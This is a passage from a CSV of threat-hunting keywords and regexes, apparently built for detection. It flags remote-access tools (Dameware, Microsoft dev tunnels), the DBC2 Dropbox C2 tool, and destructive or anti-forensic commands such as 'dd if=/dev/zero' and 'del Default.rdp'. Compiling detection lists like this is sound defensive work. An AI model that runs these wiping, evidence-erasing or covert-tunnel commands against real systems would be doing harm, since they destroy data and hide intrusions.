Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "**",".{0,1000}\.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 
Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*admin.*.swi-dre.com*",".{0,1000}admin\..{0,1000}\.swi\-dre\.com.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*C:\Program Files\SolarWinds\Dameware Mini Remote Control x64\*",".{0,1000}C\:\\Program\sFiles\\SolarWinds\\Dameware\sMini\sRemote\sControl\sx64\\.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*C:\Users\mthcht\AppData\Roaming\DameWare Development\*",".{0,1000}C\:\\Users\\mthcht\\AppData\\Roaming\\DameWare\sDevelopment\\.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*chat.us.n-able.com*",".{0,1000}chat\.us\.n\-able\.com.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*'company'>n-able take control*",".{0,1000}\'company\'\>n\-able\stake\scontrol\<\/data\>.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 
Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*comserver.corporate.beanywhere.com*",".{0,1000}comserver\.corporate\.beanywhere\.com.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*DameWare Development Common Data\Mini Remote Control*",".{0,1000}DameWare\sDevelopment\sCommon\sData\\Mini\sRemote\sControl.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*DameWare Development\Agent Configuration*",".{0,1000}DameWare\sDevelopment\\Agent\sConfiguration.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*dameware remote everywhere agent - [dameware]*",".{0,1000}dameware\sremote\severywhere\sagent\s\-\s\[dameware\].{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*DameWare Remote Support.exe*",".{0,1000}DameWare\sRemote\sSupport\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 
Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","Dameware Remote Support","10","10","N/A","N/A","N/A","N/A" "*damewareagent.msi*",".{0,1000}damewareagent\.msi.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*damewareremoteeverywhereagent.exe*",".{0,1000}damewareremoteeverywhereagent\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*damewareremoteeverywhereconsole.exe*",".{0,1000}damewareremoteeverywhereconsole\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*'Description'>Dameware products*",".{0,1000}\'Description\'\>Dameware\sproducts\<\/Data\>.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*download.global.mspa.n-able.com/*",".{0,1000}download\.global\.mspa\.n\-able\.com\/.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*getsupportservice_common_dameware\logs*",".{0,1000}getsupportservice_common_dameware\\logs.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://downloads.solarwinds.com/solarwinds/Release/DameWare/*",".{0,1000}https\:\/\/downloads\.solarwinds\.com\/solarwinds\/Release\/DameWare\/.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","1","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*login.swi-dre.com*",".{0,1000}login\.swi\-dre\.com.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*msi-installs.swi-rc.com/*",".{0,1000}msi\-installs\.swi\-rc\.com\/.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*notifications.*.swi-rc.com*",".{0,1000}notifications\..{0,1000}\.swi\-rc\.com.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*product: damewareagent 
--*",".{0,1000}product\:\sdamewareagent\s\-\-.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*provider name=""n-able take control - [dameware]"" />*",".{0,1000}provider\sname\=\""n\-able\stake\scontrol\s\-\s\[dameware\]\""\s\/\>.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*--single-argument https://www.solarwinds.com/*/remote-support-software*",".{0,1000}\-\-single\-argument\shttps\:\/\/www\.solarwinds\.com\/.{0,1000}\/remote\-support\-software.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","Dameware Remote Support","10","10","N/A","N/A","N/A","N/A" "*SolarWinds.MRC.Licensor*",".{0,1000}SolarWinds\.MRC\.Licensor.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*SolarWinds.Orion.MaintDateCheck*",".{0,1000}SolarWinds\.Orion\.MaintDateCheck.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","0","N/A","Dameware Mini Remote 
Control","10","10","N/A","N/A","N/A","N/A" "*SolarWinds-Dameware-DRS-St.exe*",".{0,1000}SolarWinds\-Dameware\-DRS\-St\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","1","N/A","Dameware Remote Support","10","10","N/A","N/A","N/A","N/A" "*SolarWinds-Dameware-DRS-St-Eval.zip*",".{0,1000}SolarWinds\-Dameware\-DRS\-St\-Eval\.zip.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","1","N/A","Dameware Remote Support","10","10","N/A","N/A","N/A","N/A" "*SolarWinds-Dameware-MRC-32bit-St.exe*",".{0,1000}SolarWinds\-Dameware\-MRC\-32bit\-St\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","1","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*SolarWinds-Dameware-MRC-32bit-St-Eval.zip*",".{0,1000}SolarWinds\-Dameware\-MRC\-32bit\-St\-Eval\.zip.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","1","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*SolarWinds-Dameware-MRC-64bit-St.exe*",".{0,1000}SolarWinds\-Dameware\-MRC\-64bit\-St\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","1","N/A","Dameware Mini 
Remote Control","10","10","N/A","N/A","N/A","N/A" "*SolarWinds-Dameware-MRC-64bit-St-Eval.zip*",".{0,1000}SolarWinds\-Dameware\-MRC\-64bit\-St\-Eval\.zip.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","1","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*stop dameware remote everywhere agent.lnk*",".{0,1000}stop\sdameware\sremote\severywhere\sagent\.lnk.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*techws.*.swi-rc.com*",".{0,1000}techws\..{0,1000}\.swi\-rc\.com.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*vaults.*.swi-rc.com*",".{0,1000}vaults\..{0,1000}\.swi\-rc\.com.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://api.dropboxapi.com/*",".{0,1000}https\:\/\/api\.dropboxapi\.com\/.{0,1000}","greyware_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controller running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered 
Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","Dropbox API calls - Understanding your environment with the applications used and allowed will enhance the effectiveness of your hunt here","10","10","282","80","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*dd if=/dev/nul*",".{0,1000}dd\sif\=\/dev\/nul.{0,1000}","greyware_tool_keyword","dd","Detects overwriting (effectively wiping/deleting) the file","T1070.004 - T1485","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","9509","2752","2024-08-28T03:10:37Z","2017-10-11T17:23:32Z" "*dd if=/dev/zero*",".{0,1000}dd\sif\=\/dev\/zero.{0,1000}","greyware_tool_keyword","dd","Detects overwriting (effectively wiping/deleting) the file","T1070.004 - T1485","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","9509","2752","2024-08-28T03:10:37Z","2017-10-11T17:23:32Z" "*debugfs /dev/*",".{0,1000}debugfs\s\/dev\/.{0,1000}","greyware_tool_keyword","debugdfs","Linux SIEM Bypass with debugfs shell","T1059 - T1053 - T1037","TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*bihhflimonbpcfagfadcnbbdngpopnjb*",".{0,1000}bihhflimonbpcfagfadcnbbdngpopnjb.{0,1000}","greyware_tool_keyword","DEEPRISM VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in 
registry","8","10","N/A","N/A","N/A","N/A" "*del Default.rdp*",".{0,1000}del\sDefault\.rdp.{0,1000}","greyware_tool_keyword","del","removes the Default.rdp file likely to erase evidence of RDP connections","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/xiaoy-sec/Pentest_Note/blob/52156f816f0c2497c25343c2e872130193acca80/wiki/%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87/Windows%E6%8F%90%E6%9D%83/RDP%26Firewall/%E5%88%A0%E9%99%A4%E7%97%95%E8%BF%B9.md?plain=1#L4","1","0","N/A","N/A","10","10","3635","918","2023-05-22T03:50:57Z","2020-06-15T02:58:36Z" "* host -p * --allow-anonymous --protocol https*",".{0,1000}\shost\s\-p\s.{0,1000}\s\-\-allow\-anonymous\s\-\-protocol\shttps.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*.asse.devtunnels.ms*",".{0,1000}\.asse\.devtunnels\.ms.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*.exe host -p * - allow-anonymous*",".{0,1000}\.exe\shost\s\-p\s.{0,1000}\s\-\sallow\-anonymous.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. 
Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*.exe port create -p *",".{0,1000}\.exe\sport\screate\s\-p\s.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*-443.devtunnels.ms*",".{0,1000}\-443\.devtunnels\.ms.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*asse.rel.tunnels.api.visualstudio.com*",".{0,1000}asse\.rel\.tunnels\.api\.visualstudio\.com.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. 
Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*auc1.rel.tunnels.api.visualstudio.com*",".{0,1000}auc1\.rel\.tunnels\.api\.visualstudio\.com.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*aue.rel.tunnels.api.visualstudio.com*",".{0,1000}aue\.rel\.tunnels\.api\.visualstudio\.com.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*brs.rel.tunnels.api.visualstudio.com*",".{0,1000}brs\.rel\.tunnels\.api\.visualstudio\.com.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. 
Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*devtunnel create *",".{0,1000}devtunnel\screate\s.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*devtunnel host -p *",".{0,1000}devtunnel\shost\s\-p\s.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*devtunnel* user login -*",".{0,1000}devtunnel.{0,1000}\suser\slogin\s\-.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. 
Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*devtunnel.exe *",".{0,1000}devtunnel\.exe\s.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*eun1.rel.tunnels.api.visualstudio.com*",".{0,1000}eun1\.rel\.tunnels\.api\.visualstudio\.com.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*euw.rel.tunnels.api.visualstudio.com*",".{0,1000}euw\.rel\.tunnels\.api\.visualstudio\.com.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. 
Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*global.rel.tunnels.api.visualstudio.com*",".{0,1000}global\.rel\.tunnels\.api\.visualstudio\.com.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*https://*.*.devtunnels.ms*",".{0,1000}https\:\/\/.{0,1000}\..{0,1000}\.devtunnels\.ms.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*https://*.brs.devtunnels.ms/*",".{0,1000}https\:\/\/.{0,1000}\.brs\.devtunnels\.ms\/.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. 
Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","0","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*https://*.euw.devtunnels.ms*",".{0,1000}https\:\/\/.{0,1000}\.euw\.devtunnels\.ms.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","0","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*https://*.use.devtunnels.ms*",".{0,1000}https\:\/\/.{0,1000}\.use\.devtunnels\.ms.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","0","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*https://aka.ms/DevTunnelCliInstall*",".{0,1000}https\:\/\/aka\.ms\/DevTunnelCliInstall.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. 
Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","0","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*inc1.rel.tunnels.api.visualstudio.com*",".{0,1000}inc1\.rel\.tunnels\.api\.visualstudio\.com.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*Microsoft.DevTunnels.Connections.dll*",".{0,1000}Microsoft\.DevTunnels\.Connections\.dll.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*Microsoft.DevTunnels.Contracts.dll*",".{0,1000}Microsoft\.DevTunnels\.Contracts\.dll.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. 
Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*Microsoft.DevTunnels.Management.dll*",".{0,1000}Microsoft\.DevTunnels\.Management\.dll.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" 